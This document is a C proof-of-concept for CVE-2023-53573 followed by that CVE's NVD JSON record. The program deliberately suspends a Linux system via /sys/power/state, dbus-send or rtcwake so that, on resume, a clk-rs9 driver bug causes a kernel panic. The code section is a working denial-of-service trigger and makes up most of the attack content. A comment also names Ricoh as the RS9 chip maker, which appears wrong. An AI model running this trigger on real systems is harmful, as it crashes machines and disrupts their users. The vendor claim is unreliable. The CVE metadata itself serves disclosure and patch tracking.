CVE-2023-53573

// CVE-2023-53573 PoC - Trigger kernel panic via suspend/resume // This vulnerability is triggered when the system resumes from suspend // because the clk-rs9 driver's resume path attempts cache synchronization // while the cache has been disabled (REGCACHE_NONE), causing a NULL pointer // dereference on map->cache_ops. #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <string.h> // Method 1: Use systemd suspend via D-Bus int trigger_suspend_via_dbus() { // Requires the rs9 clock chip to be present on the system // (e.g., in embedded/industrial hardware using Ricoh RS9 clock generator) int ret = system("dbus-send --system --print-reply \ --dest=org.freedesktop.login1 \ /org/freedesktop/login1 \ org.freedesktop.login1.Manager.Suspend boolean:true"); return ret; } // Method 2: Write to /sys/power/state to trigger suspend int trigger_suspend_via_sysfs() { int fd; fd = open("/sys/power/state", O_WRONLY); if (fd < 0) { perror("open /sys/power/state"); return -1; } // Writing "mem" triggers suspend-to-RAM // On resume, the rs9 driver's resume callback will attempt // regcache_sync() with cache_ops == NULL, causing kernel panic if (write(fd, "mem", 3) < 0) { perror("write to /sys/power/state"); close(fd); return -1; } close(fd); return 0; } // Method 3: Use rtcwake to automatically wake and trigger the bug int trigger_suspend_with_rtcwake() { // Suspend for 5 seconds, then resume // The resume path will trigger the vulnerability int ret = system("rtcwake -m mem -s 5"); return ret; } int main(int argc, char *argv[]) { printf("CVE-2023-53573 - Linux kernel clk:rs9 suspend/resume PoC\n"); printf("WARNING: This will crash the system if the rs9 driver is loaded!\n"); if (argc > 1 && strcmp(argv[1], "--confirm") == 0) { // Trigger suspend to demonstrate the vulnerability trigger_suspend_via_sysfs(); } else { printf("Usage: %s --confirm\n", argv[0]); printf("This PoC triggers a kernel panic by suspending the system.\n"); printf("On resume, the clk-rs9 driver's resume callback attempts\n"); printf("regcache_sync() with map->cache_ops == NULL (REGCACHE_NONE),\n"); printf("causing a NULL pointer dereference and kernel panic.\n"); } return 0; } // Kernel-side trigger conditions: // - The rs9 clock driver must be loaded (CONFIG_COMMON_CLK_RS9) // - The system must support suspend/resume // - The rs9 chip must be present on the I2C bus // // The fix (commit 632e04739c8f) re-enables flat cache (REGCACHE_FLAT) // and adds num_reg_defaults_raw to read defaults from hardware.

{"cve": {"id": "CVE-2023-53573", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.917", "lastModified": "2026-03-21T01:07:42.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: rs9: Fix suspend/resume\n\nDisabling the cache in commit 2ff4ba9e3702 (\"clk: rs9: Fix I2C accessors\")\nwithout removing cache synchronization in resume path results in a\nkernel panic as map->cache_ops is unset, due to REGCACHE_NONE.\nEnable flat cache again to support resume again. num_reg_defaults_raw\nis necessary to read the cache defaults from hardware. Some registers\nare strapped in hardware and cannot be provided in software."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.8", "versionEndExcluding": "6.1", "matchCriteriaId": "C49BA079-1891-4A21-B1A5-DB8C45CD20B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.1", "versionEndExcluding": "6.1.25", "matchCriteriaId": "BABF4313-DC0E-452A-9129-0C09389863AA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.12", "matchCriteriaId": "4AA01E0B-227C-4686-AC91-BA30BCC48E6D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:-:*:*:*:*:*:*", "matchCriteriaId": "DE093B34-F4CD-4052-8122-730D6537A91A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc4:*:*:*:*:*:*", "matchCriteriaId": "1C6E00FE-5FB9-4D20-A1A1-5A32128F9B76"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc5:*:*:*:*:*:*", "matchCriteriaId": "35B26BE4-43A6-4A36-A7F6-5B3F572D9186"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc6:*:*:*:*:*:*", "matchCriteriaId": "3FFFB0B3-930D-408A-91E2-BAE0C2715D80"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc7:*:*:*:*:*:*", "matchCriteriaId": "8535320E-A0DB-4277-800E-D0CE5BBA59E8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc8:*:*:*:*:*:*", "matchCriteriaId": "21718AA4-4056-40F2-968E-BDAA465A7872"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc4:*:*:*:*:*:*", "matchCriteriaId": "DC271202-7570-4505-89A4-D602D47BFD00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc5:*:*:*:*:*:*", "matchCriteriaId": "D413BB6D-4F74-4C7D-9163-47786619EF53"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc6:*:*:*:*:*:*", "matchCriteriaId": "F4D613FB-9976-4989-8C4A-567773373CEA"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/632e04739c8f45c2d9ca4d4c5bd18d80c2ac9296", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/74f4471ad64214dd5046213ebdd6e0930da7bd2c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a983967602675880d6160a17ace2c0f48717ff33", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}